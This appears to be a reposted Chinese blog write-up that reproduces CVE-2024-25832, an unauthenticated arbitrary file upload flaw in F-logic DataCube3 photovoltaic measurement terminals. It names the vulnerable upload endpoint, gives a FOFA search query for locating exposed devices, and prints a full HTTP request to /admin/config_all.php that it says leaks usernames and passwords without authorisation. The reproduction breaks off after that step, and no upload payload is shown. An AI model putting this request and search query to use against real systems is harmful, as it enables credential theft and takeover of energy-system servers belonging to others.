本文主要是介绍F-logic DataCube3 任意文件上传漏洞复现(CVE-2024-25832),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统。
0x02 漏洞概述
F-logic DataCube3 /admin/setting_photo.php接口处存在任意文件上传漏洞 ,未经身份验证的攻击者可通过该漏洞在服务器端写入后门,获取服务器权限,进而控制整个web服务器。
0x03 影响范围
F-logic DataCube3测量系统版本1.0
0x04 复现环境
FOFA:title=="DataCube3"
0x05 漏洞复现
未授权获取用户名密码
GET /admin/config_all.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive这篇关于F-logic DataCube3 任意文件上传漏洞复现(CVE-2024-25832)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
